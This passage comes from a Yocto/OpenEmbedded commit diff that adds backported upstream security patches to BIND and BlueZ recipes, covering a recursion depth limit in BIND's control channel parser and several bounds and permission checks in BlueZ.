165 NODE_UNLOCK(&rbtdb->node_locks[locknum].lock,
166 isc_rwlocktype_write);
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
new file mode 100644
index 0000000000..be479cb00e
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch
@@ -0,0 +1,175 @@
1From c4fac5ca98efd02fbaef43601627c7a3a09f5a71 Mon Sep 17 00:00:00 2001
2From: Mark Andrews <marka@isc.org>
3Date: Tue, 20 Jun 2023 15:21:36 +1000
4Subject: [PATCH] Limit isccc_cc_fromwire recursion depth
5
6Named and rndc do not need a lot of recursion so the depth is
7set to 10.
8
9Taken from BIND 9.16.44 change.
10
11Upstream-Status: Backport [https://gitlab.isc.org/isc-projects/bind9/-/commit/c4fac5ca98efd02fbaef43601627c7a3a09f5a71]
12CVE: CVE-2023-3341
13Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
14---
15 lib/isccc/cc.c | 38 +++++++++++++++++++++++---------
16 lib/isccc/include/isccc/result.h | 4 +++-
17 lib/isccc/result.c | 4 +++-
18 3 files changed, 34 insertions(+), 12 deletions(-)
19
20diff --git a/lib/isccc/cc.c b/lib/isccc/cc.c
21index e012685..8eac3d6 100644
22--- a/lib/isccc/cc.c
23+++ b/lib/isccc/cc.c
24@@ -53,6 +53,10 @@
25
26 #define MAX_TAGS 256
27 #define DUP_LIFETIME 900
28+#ifndef ISCCC_MAXDEPTH
29+#define ISCCC_MAXDEPTH \
30+ 10 /* Big enough for rndc which just sends a string each way. */
31+#endif
32
33 typedef isccc_sexpr_t *sexpr_ptr;
34
35@@ -561,19 +565,25 @@ verify(isccc_sexpr_t *alist, unsigned char *data, unsigned int length,
36
37 static isc_result_t
38 table_fromwire(isccc_region_t *source, isccc_region_t *secret,
39- uint32_t algorithm, isccc_sexpr_t **alistp);
40+ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp);
41
42 static isc_result_t
43-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp);
44+list_fromwire(isccc_region_t *source, unsigned int depth,
45+ isccc_sexpr_t **listp);
46
47 static isc_result_t
48-value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
49+value_fromwire(isccc_region_t *source, unsigned int depth,
50+ isccc_sexpr_t **valuep) {
51 unsigned int msgtype;
52 uint32_t len;
53 isccc_sexpr_t *value;
54 isccc_region_t active;
55 isc_result_t result;
56
57+ if (depth > ISCCC_MAXDEPTH) {
58+ return (ISCCC_R_MAXDEPTH);
59+ }
60+
61 if (REGION_SIZE(*source) < 1 + 4)
62 return (ISC_R_UNEXPECTEDEND);
63 GET8(msgtype, source->rstart);
64@@ -591,9 +601,9 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
65 } else
66 result = ISC_R_NOMEMORY;
67 } else if (msgtype == ISCCC_CCMSGTYPE_TABLE)
68- result = table_fromwire(&active, NULL, 0, valuep);
69+ result = table_fromwire(&active, NULL, 0, depth + 1, valuep);
70 else if (msgtype == ISCCC_CCMSGTYPE_LIST)
71- result = list_fromwire(&active, valuep);
72+ result = list_fromwire(&active, depth + 1, valuep);
73 else
74 result = ISCCC_R_SYNTAX;
75
76@@ -602,7 +612,7 @@ value_fromwire(isccc_region_t *source, isccc_sexpr_t **valuep) {
77
78 static isc_result_t
79 table_fromwire(isccc_region_t *source, isccc_region_t *secret,
80- uint32_t algorithm, isccc_sexpr_t **alistp)
81+ uint32_t algorithm, unsigned int depth, isccc_sexpr_t **alistp)
82 {
83 char key[256];
84 uint32_t len;
85@@ -613,6 +623,10 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
86
87 REQUIRE(alistp != NULL && *alistp == NULL);
88
89+ if (depth > ISCCC_MAXDEPTH) {
90+ return (ISCCC_R_MAXDEPTH);
91+ }
92+
93 checksum_rstart = NULL;
94 first_tag = true;
95 alist = isccc_alist_create();
96@@ -628,7 +642,7 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
97 GET_MEM(key, len, source->rstart);
98 key[len] = '\0'; /* Ensure NUL termination. */
99 value = NULL;
100- result = value_fromwire(source, &value);
101+ result = value_fromwire(source, depth + 1, &value);
102 if (result != ISC_R_SUCCESS)
103 goto bad;
104 if (isccc_alist_define(alist, key, value) == NULL) {
105@@ -661,14 +675,18 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
106 }
107
108 static isc_result_t
109-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp) {
110+list_fromwire(isccc_region_t *source, unsigned int depth, isccc_sexpr_t **listp) {
111 isccc_sexpr_t *list, *value;
112 isc_result_t result;
113
114+ if (depth > ISCCC_MAXDEPTH) {
115+ return (ISCCC_R_MAXDEPTH);
116+ }
117+
118 list = NULL;
119 while (!REGION_EMPTY(*source)) {
120 value = NULL;
121- result = value_fromwire(source, &value);
122+ result = value_fromwire(source, depth + 1, &value);
123 if (result != ISC_R_SUCCESS) {
124 isccc_sexpr_free(&list);
125 return (result);
126@@ -699,7 +717,7 @@ isccc_cc_fromwire(isccc_region_t *source, isccc_sexpr_t **alistp,
127 if (version != 1)
128 return (ISCCC_R_UNKNOWNVERSION);
129
130- return (table_fromwire(source, secret, algorithm, alistp));
131+ return (table_fromwire(source, secret, algorithm, 0, alistp));
132 }
133
134 static isc_result_t
135diff --git a/lib/isccc/include/isccc/result.h b/lib/isccc/include/isccc/result.h
136index 6c79dd7..a85861c 100644
137--- a/lib/isccc/include/isccc/result.h
138+++ b/lib/isccc/include/isccc/result.h
139@@ -47,8 +47,10 @@
140 #define ISCCC_R_CLOCKSKEW (ISC_RESULTCLASS_ISCCC + 4)
141 /*% Duplicate */
142 #define ISCCC_R_DUPLICATE (ISC_RESULTCLASS_ISCCC + 5)
143+/*% Maximum recursion depth */
144+#define ISCCC_R_MAXDEPTH (ISC_RESULTCLASS_ISCCC + 6)
145
146-#define ISCCC_R_NRESULTS 6 /*%< Number of results */
147+#define ISCCC_R_NRESULTS 7 /*%< Number of results */
148
149 ISC_LANG_BEGINDECLS
150
151diff --git a/lib/isccc/result.c b/lib/isccc/result.c
152index 8419bbb..325200b 100644
153--- a/lib/isccc/result.c
154+++ b/lib/isccc/result.c
155@@ -40,7 +40,8 @@ static const char *text[ISCCC_R_NRESULTS] = {
156 "bad auth", /* 3 */
157 "expired", /* 4 */
158 "clock skew", /* 5 */
159- "duplicate" /* 6 */
160+ "duplicate", /* 6 */
161+ "max depth", /* 7 */
162 };
163
164 static const char *ids[ISCCC_R_NRESULTS] = {
165@@ -50,6 +51,7 @@ static const char *ids[ISCCC_R_NRESULTS] = {
166 "ISCCC_R_EXPIRED",
167 "ISCCC_R_CLOCKSKEW",
168 "ISCCC_R_DUPLICATE",
169+ "ISCCC_R_MAXDEPTH",
170 };
171
172 #define ISCCC_RESULT_RESULTSET 2
173--
1742.25.1
175
diff --git a/meta/recipes-connectivity/bind/bind_9.11.22.bb b/meta/recipes-connectivity/bind/bind_9.11.37.bb
index 3b4a299b36..95bb5be005 100644
--- a/meta/recipes-connectivity/bind/bind_9.11.22.bb
+++ b/meta/recipes-connectivity/bind/bind_9.11.37.bb
@@ -1,9 +1,10 @@
1SUMMARY = "ISC Internet Domain Name Server" 1SUMMARY = "ISC Internet Domain Name Server"
2HOMEPAGE = "https://www.isc.org/bind/" 2HOMEPAGE = "https://www.isc.org/bind/"
3DESCRIPTION = "BIND 9 provides a full-featured Domain Name Server system"
3SECTION = "console/network" 4SECTION = "console/network"
4 5
5LICENSE = "ISC & BSD" 6LICENSE = "ISC & BSD"
6LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=bf39058a7f64b2a934ce14dc9ec1dd45" 7LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=89a97ebbf713f7125fe5c02223d3ae95"
7 8
8DEPENDS = "openssl libcap zlib" 9DEPENDS = "openssl libcap zlib"
9 10
@@ -18,9 +19,14 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \
18 file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \ 19 file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \
19 file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \ 20 file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \
20 file://0001-avoid-start-failure-with-bind-user.patch \ 21 file://0001-avoid-start-failure-with-bind-user.patch \
22 file://CVE-2022-2795.patch \
23 file://CVE-2022-38177.patch \
24 file://CVE-2022-38178.patch \
25 file://CVE-2023-2828.patch \
26 file://CVE-2023-3341.patch \
21 " 27 "
22 28
23SRC_URI[sha256sum] = "afc6d8015006f1cabf699ff19f517bb8fd9c1811e5231f26baf51c3550262ac9" 29SRC_URI[sha256sum] = "0d8efbe7ec166ada90e46add4267b7e7c934790cba9bd5af6b8380a4fbfb5aff"
24 30
25UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/" 31UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/"
26# stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4 32# stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4
diff --git a/meta/recipes-connectivity/bluez5/bluez5.inc b/meta/recipes-connectivity/bluez5/bluez5.inc
index f34ba0dce5..74fd344170 100644
--- a/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
7 file://COPYING.LIB;md5=fb504b67c50331fc78734fed90fb0e09 \ 7 file://COPYING.LIB;md5=fb504b67c50331fc78734fed90fb0e09 \
8 file://src/main.c;beginline=1;endline=24;md5=9bc54b93cd7e17bf03f52513f39f926e" 8 file://src/main.c;beginline=1;endline=24;md5=9bc54b93cd7e17bf03f52513f39f926e"
9DEPENDS = "dbus glib-2.0" 9DEPENDS = "dbus glib-2.0"
10RDEPENDS:${PN} += "dbus"
10PROVIDES += "bluez-hcidump" 11PROVIDES += "bluez-hcidump"
11RPROVIDES_${PN} += "bluez-hcidump" 12RPROVIDES_${PN} += "bluez-hcidump"
12 13
@@ -52,6 +53,13 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
52 ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \ 53 ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \
53 file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \ 54 file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
54 file://0001-test-gatt-Fix-hung-issue.patch \ 55 file://0001-test-gatt-Fix-hung-issue.patch \
56 file://CVE-2021-0129.patch \
57 file://CVE-2021-3588.patch \
58 file://CVE-2021-3658.patch \
59 file://CVE-2022-0204.patch \
60 file://CVE-2022-39176.patch \
61 file://CVE-2022-3637.patch \
62 file://CVE-2023-45866.patch \
55 " 63 "
56S = "${WORKDIR}/bluez-${PV}" 64S = "${WORKDIR}/bluez-${PV}"
57 65
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
new file mode 100644
index 0000000000..b39730dc10
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
@@ -0,0 +1,109 @@
1From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001
2From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
3Date: Tue, 2 Mar 2021 11:38:33 -0800
4Subject: shared/gatt-server: Fix not properly checking for secure flags
5
6When passing the mask to check_permissions all valid permissions for
7the operation must be set including BT_ATT_PERM_SECURE flags.
8
9Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738]
10Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
11CVE: CVE-2021-0129
12---
13 src/shared/att-types.h | 8 ++++++++
14 src/shared/gatt-server.c | 25 +++++++------------------
15 2 files changed, 15 insertions(+), 18 deletions(-)
16
17diff --git a/src/shared/att-types.h b/src/shared/att-types.h
18index 7108b4e94..3adc05d9e 100644
19--- a/src/shared/att-types.h
20+++ b/src/shared/att-types.h
21@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp {
22 #define BT_ATT_PERM_WRITE_SECURE 0x0200
23 #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \
24 BT_ATT_PERM_WRITE_SECURE)
25+#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \
26+ BT_ATT_PERM_READ_AUTHEN | \
27+ BT_ATT_PERM_READ_ENCRYPT | \
28+ BT_ATT_PERM_READ_SECURE)
29+#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \
30+ BT_ATT_PERM_WRITE_AUTHEN | \
31+ BT_ATT_PERM_WRITE_ENCRYPT | \
32+ BT_ATT_PERM_WRITE_SECURE)
33
34 /* GATT Characteristic Properties Bitfield values */
35 #define BT_GATT_CHRC_PROP_BROADCAST 0x01
36diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
37index b5f7de7dc..970c35f94 100644
38--- a/src/shared/gatt-server.c
39+++ b/src/shared/gatt-server.c
40@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op)
41 return;
42 }
43
44- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
45- BT_ATT_PERM_READ_AUTHEN |
46- BT_ATT_PERM_READ_ENCRYPT);
47+ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
48 if (ecode)
49 goto error;
50
51@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
52 (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
53 handle);
54
55- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
56- BT_ATT_PERM_WRITE_AUTHEN |
57- BT_ATT_PERM_WRITE_ENCRYPT);
58+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
59 if (ecode)
60 goto error;
61
62@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan,
63 opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "",
64 handle);
65
66- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
67- BT_ATT_PERM_READ_AUTHEN |
68- BT_ATT_PERM_READ_ENCRYPT);
69+ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
70 if (ecode)
71 goto error;
72
73@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err,
74 goto error;
75 }
76
77- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ |
78- BT_ATT_PERM_READ_AUTHEN |
79- BT_ATT_PERM_READ_ENCRYPT);
80+ ecode = check_permissions(data->server, next_attr,
81+ BT_ATT_PERM_READ_MASK);
82 if (ecode)
83 goto error;
84
85@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode,
86 goto error;
87 }
88
89- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ |
90- BT_ATT_PERM_READ_AUTHEN |
91- BT_ATT_PERM_READ_ENCRYPT);
92+ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK);
93 if (ecode)
94 goto error;
95
96@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
97 util_debug(server->debug_callback, server->debug_data,
98 "Prep Write Req - handle: 0x%04x", handle);
99
100- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
101- BT_ATT_PERM_WRITE_AUTHEN |
102- BT_ATT_PERM_WRITE_ENCRYPT);
103+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
104 if (ecode)
105 goto error;
106
107--
108cgit 1.2.3-1.el7
109
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
new file mode 100644
index 0000000000..f52ff47a06
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
@@ -0,0 +1,34 @@
1From 3a40bef49305f8327635b81ac8be52a3ca063d5a Mon Sep 17 00:00:00 2001
2From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
3Date: Mon, 4 Jan 2021 10:38:31 -0800
4Subject: [PATCH] gatt: Fix potential buffer out-of-bound
5
6When client features is read check if the offset is within the cli_feat
7bounds.
8
9Fixes: https://github.com/bluez/bluez/issues/70
10
11+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=3a40bef49305f8327635b81ac8be52a3ca063d5a]
12+Signed-off-by: Steve Sakoman <steve@sakoman.com>
13+CVE: CVE-2021-3588
14
15---
16 src/gatt-database.c | 5 +++++
17 1 file changed, 5 insertions(+)
18
19diff --git a/src/gatt-database.c b/src/gatt-database.c
20index 90cc4bade..f2d7b5821 100644
21--- a/src/gatt-database.c
22+++ b/src/gatt-database.c
23@@ -1075,6 +1075,11 @@ static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
24 goto done;
25 }
26
27+ if (offset >= sizeof(state->cli_feat)) {
28+ ecode = BT_ATT_ERROR_INVALID_OFFSET;
29+ goto done;
30+ }
31+
32 len = sizeof(state->cli_feat) - offset;
33 value = len ? &state->cli_feat[offset] : NULL;
34
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
new file mode 100644
index 0000000000..1738ca13da
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
@@ -0,0 +1,95 @@
1From b497b5942a8beb8f89ca1c359c54ad67ec843055 Mon Sep 17 00:00:00 2001
2From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
3Date: Thu, 24 Jun 2021 16:32:04 -0700
4Subject: [PATCH] adapter: Fix storing discoverable setting
5
6discoverable setting shall only be store when changed via Discoverable
7property and not when discovery client set it as that be considered
8temporary just for the lifetime of the discovery.
9
10Upstream-Status: Backport [https://github.com/bluez/bluez/commit/b497b5942a8beb8f89ca1c359c54ad67ec843055]
11Signed-off-by:Minjae Kim <flowergom@gmail.com>
12---
13 src/adapter.c | 35 ++++++++++++++++++++++-------------
14 1 file changed, 22 insertions(+), 13 deletions(-)
15
16diff --git a/src/adapter.c b/src/adapter.c
17index 12e4ff5c0..663b778e4 100644
18--- a/src/adapter.c
19+++ b/src/adapter.c
20@@ -560,7 +560,11 @@ static void settings_changed(struct btd_adapter *adapter, uint32_t settings)
21 if (changed_mask & MGMT_SETTING_DISCOVERABLE) {
22 g_dbus_emit_property_changed(dbus_conn, adapter->path,
23 ADAPTER_INTERFACE, "Discoverable");
24- store_adapter_info(adapter);
25+ /* Only persist discoverable setting if it was not set
26+ * temporarily by discovery.
27+ */
28+ if (!adapter->discovery_discoverable)
29+ store_adapter_info(adapter);
30 btd_adv_manager_refresh(adapter->adv_manager);
31 }
32
33@@ -2162,8 +2166,6 @@ static bool filters_equal(struct mgmt_cp_start_service_discovery *a,
34 static int update_discovery_filter(struct btd_adapter *adapter)
35 {
36 struct mgmt_cp_start_service_discovery *sd_cp;
37- GSList *l;
38-
39
40 DBG("");
41
42@@ -2173,17 +2175,24 @@ static int update_discovery_filter(struct btd_adapter *adapter)
43 return -ENOMEM;
44 }
45
46- for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
47- struct discovery_client *client = l->data;
48+ /* Only attempt to overwrite current discoverable setting when not
49+ * discoverable.
50+ */
51+ if (!(adapter->current_settings & MGMT_OP_SET_DISCOVERABLE)) {
52+ GSList *l;
53
54- if (!client->discovery_filter)
55- continue;
56+ for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
57+ struct discovery_client *client = l->data;
58
59- if (client->discovery_filter->discoverable)
60- break;
61- }
62+ if (!client->discovery_filter)
63+ continue;
64
65- set_discovery_discoverable(adapter, l ? true : false);
66+ if (client->discovery_filter->discoverable) {
67+ set_discovery_discoverable(adapter, true);
68+ break;
69+ }
70+ }
71+ }
72
73 /*
74 * If filters are equal, then don't update scan, except for when
75@@ -2216,8 +2225,7 @@ static int discovery_stop(struct discovery_client *client)
76 return 0;
77 }
78
79- if (adapter->discovery_discoverable)
80- set_discovery_discoverable(adapter, false);
81+ set_discovery_discoverable(adapter, false);
82
83 /*
84 * In the idle phase of a discovery, there is no need to stop it
85@@ -6913,6 +6921,7 @@ static void adapter_stop(struct btd_adapter *adapter)
86 g_free(adapter->current_discovery_filter);
87 adapter->current_discovery_filter = NULL;
88
89+ set_discovery_discoverable(adapter, false);
90 adapter->discovering = false;
91
92 while (adapter->connections) {
93--
942.25.1
95
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
new file mode 100644
index 0000000000..646b5ddfc8
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
@@ -0,0 +1,66 @@
1From 0d328fdf6564b67fc2ec3533e3da201ebabcc9e3 Mon Sep 17 00:00:00 2001
2From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
3Date: Tue, 8 Jun 2021 16:46:49 -0700
4Subject: [PATCH] shared/gatt-server: Fix heap overflow when appending prepare
5 writes
6
7The code shall check if the prepare writes would append more the
8allowed maximum attribute length.
9
10Fixes https://github.com/bluez/bluez/security/advisories/GHSA-479m-xcq5-9g2q
11
12Upstream-Status: Backport [https://github.com/bluez/bluez/commit/591c546c536b42bef696d027f64aa22434f8c3f0]
13Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
14CVE: CVE-2022-0204
15
16---
17 src/shared/gatt-server.c | 22 ++++++++++++++++++++++
18 1 file changed, 22 insertions(+)
19
20diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
21index 0c25a97..20e14bc 100644
22--- a/src/shared/gatt-server.c
23+++ b/src/shared/gatt-server.c
24@@ -816,6 +816,20 @@ static uint8_t authorize_req(struct bt_gatt_server *server,
25 server->authorize_data);
26 }
27
28+static uint8_t check_length(uint16_t length, uint16_t offset)
29+{
30+ if (length > BT_ATT_MAX_VALUE_LEN)
31+ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
32+
33+ if (offset > BT_ATT_MAX_VALUE_LEN)
34+ return BT_ATT_ERROR_INVALID_OFFSET;
35+
36+ if (length + offset > BT_ATT_MAX_VALUE_LEN)
37+ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
38+
39+ return 0;
40+}
41+
42 static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
43 uint16_t length, void *user_data)
44 {
45@@ -846,6 +860,10 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
46 (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
47 handle);
48
49+ ecode = check_length(length, 0);
50+ if (ecode)
51+ goto error;
52+
53 ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
54 if (ecode)
55 goto error;
56@@ -1353,6 +1371,10 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
57 util_debug(server->debug_callback, server->debug_data,
58 "Prep Write Req - handle: 0x%04x", handle);
59
60+ ecode = check_length(length, offset);
61+ if (ecode)
62+ goto error;
63+
64 ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
65 if (ecode)
66 goto error;
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
new file mode 100644
index 0000000000..4ca60f99d5
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
@@ -0,0 +1,39 @@
1From b808b2852a0b48c6f9dbb038f932613cea3126c2 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 27 Oct 2022 09:51:27 +0530
4Subject: [PATCH] CVE-2022-3637
5
6Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/monitor/jlink.c?id=1d6cfb8e625a944010956714c1802bc1e1fc6c4f]
7CVE: CVE-2022-3637
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10monitor: Fix crash when using RTT backend
11
12This fix regression introduced by "monitor: Fix memory leaks".
13J-Link shared library is in use if jlink_init() returns 0 and thus
14handle shall not be closed.
15---
16 monitor/jlink.c | 5 ++++-
17 1 file changed, 4 insertions(+), 1 deletion(-)
18
19diff --git a/monitor/jlink.c b/monitor/jlink.c
20index afa9d93..5bd4aed 100644
21--- a/monitor/jlink.c
22+++ b/monitor/jlink.c
23@@ -120,9 +120,12 @@ int jlink_init(void)
24 !jlink.tif_select || !jlink.setspeed ||
25 !jlink.connect || !jlink.getsn ||
26 !jlink.emu_getproductname ||
27- !jlink.rtterminal_control || !jlink.rtterminal_read)
28+ !jlink.rtterminal_control || !jlink.rtterminal_read) {
29+ dlclose(so);
30 return -EIO;
31+ }
32
33+ /* don't dlclose(so) here cause symbols from it are in use now */
34 return 0;
35 }
36
37--
382.25.1
39
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
new file mode 100644
index 0000000000..7bd1f5f80f
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
@@ -0,0 +1,126 @@
1From 752c7f707c3cc1eb12eadc13bc336a5c484d4bdf Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Wed, 28 Sep 2022 10:45:53 +0530
4Subject: [PATCH] CVE-2022-39176
5
6Upstream-Status: Backport [https://launchpad.net/ubuntu/+source/bluez/5.53-0ubuntu3.6]
7CVE: CVE-2022-39176
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 profiles/audio/avdtp.c | 56 +++++++++++++++++++++++++++---------------
11 profiles/audio/avrcp.c | 8 ++++++
12 2 files changed, 44 insertions(+), 20 deletions(-)
13
14diff --git a/profiles/audio/avdtp.c b/profiles/audio/avdtp.c
15index 782268c..0adf413 100644
16--- a/profiles/audio/avdtp.c
17+++ b/profiles/audio/avdtp.c
18@@ -1261,43 +1261,53 @@ struct avdtp_remote_sep *avdtp_find_remote_sep(struct avdtp *session,
19 return NULL;
20 }
21
22-static GSList *caps_to_list(uint8_t *data, int size,
23+static GSList *caps_to_list(uint8_t *data, size_t size,
24 struct avdtp_service_capability **codec,
25 gboolean *delay_reporting)
26 {
27+ struct avdtp_service_capability *cap;
28 GSList *caps;
29- int processed;
30
31 if (delay_reporting)
32 *delay_reporting = FALSE;
33
34- for (processed = 0, caps = NULL; processed + 2 <= size;) {
35- struct avdtp_service_capability *cap;
36- uint8_t length, category;
37+ if (size < sizeof(*cap))
38+ return NULL;
39+
40+ for (caps = NULL; size >= sizeof(*cap);) {
41+ struct avdtp_service_capability *cpy;
42
43- category = data[0];
44- length = data[1];
45+ cap = (struct avdtp_service_capability *)data;
46
47- if (processed + 2 + length > size) {
48+ if (sizeof(*cap) + cap->length > size) {
49 error("Invalid capability data in getcap resp");
50 break;
51 }
52
53- cap = g_malloc(sizeof(struct avdtp_service_capability) +
54- length);
55- memcpy(cap, data, 2 + length);
56+ if (cap->category == AVDTP_MEDIA_CODEC &&
57+ cap->length < sizeof(**codec)) {
58+ error("Invalid codec data in getcap resp");
59+ break;
60+ }
61+
62+ cpy = btd_malloc(sizeof(*cpy) + cap->length);
63+ memcpy(cpy, cap, sizeof(*cap) + cap->length);
64
65- processed += 2 + length;
66- data += 2 + length;
67+ size -= sizeof(*cap) + cap->length;
68+ data += sizeof(*cap) + cap->length;
69
70- caps = g_slist_append(caps, cap);
71+ caps = g_slist_append(caps, cpy);
72
73- if (category == AVDTP_MEDIA_CODEC &&
74- length >=
75- sizeof(struct avdtp_media_codec_capability))
76- *codec = cap;
77- else if (category == AVDTP_DELAY_REPORTING && delay_reporting)
78- *delay_reporting = TRUE;
79+ switch (cap->category) {
80+ case AVDTP_MEDIA_CODEC:
81+ if (codec)
82+ *codec = cpy;
83+ break;
84+ case AVDTP_DELAY_REPORTING:
85+ if (delay_reporting)
86+ *delay_reporting = TRUE;
87+ break;
88+ }
89 }
90
91 return caps;
92@@ -1494,6 +1504,12 @@ static gboolean avdtp_setconf_cmd(struct avdtp *session, uint8_t transaction,
93 &stream->codec,
94 &stream->delay_reporting);
95
96+ if (!stream->caps || !stream->codec) {
97+ err = AVDTP_UNSUPPORTED_CONFIGURATION;
98+ category = 0x00;
99+ goto failed_stream;
100+ }
101+
102 /* Verify that the Media Transport capability's length = 0. Reject otherwise */
103 for (l = stream->caps; l != NULL; l = g_slist_next(l)) {
104 struct avdtp_service_capability *cap = l->data;
105diff --git a/profiles/audio/avrcp.c b/profiles/audio/avrcp.c
106index d9471c0..0233d53 100644
107--- a/profiles/audio/avrcp.c
108+++ b/profiles/audio/avrcp.c
109@@ -1916,6 +1916,14 @@ static size_t handle_vendordep_pdu(struct avctp *conn, uint8_t transaction,
110 goto err_metadata;
111 }
112
113+ operands += sizeof(*pdu);
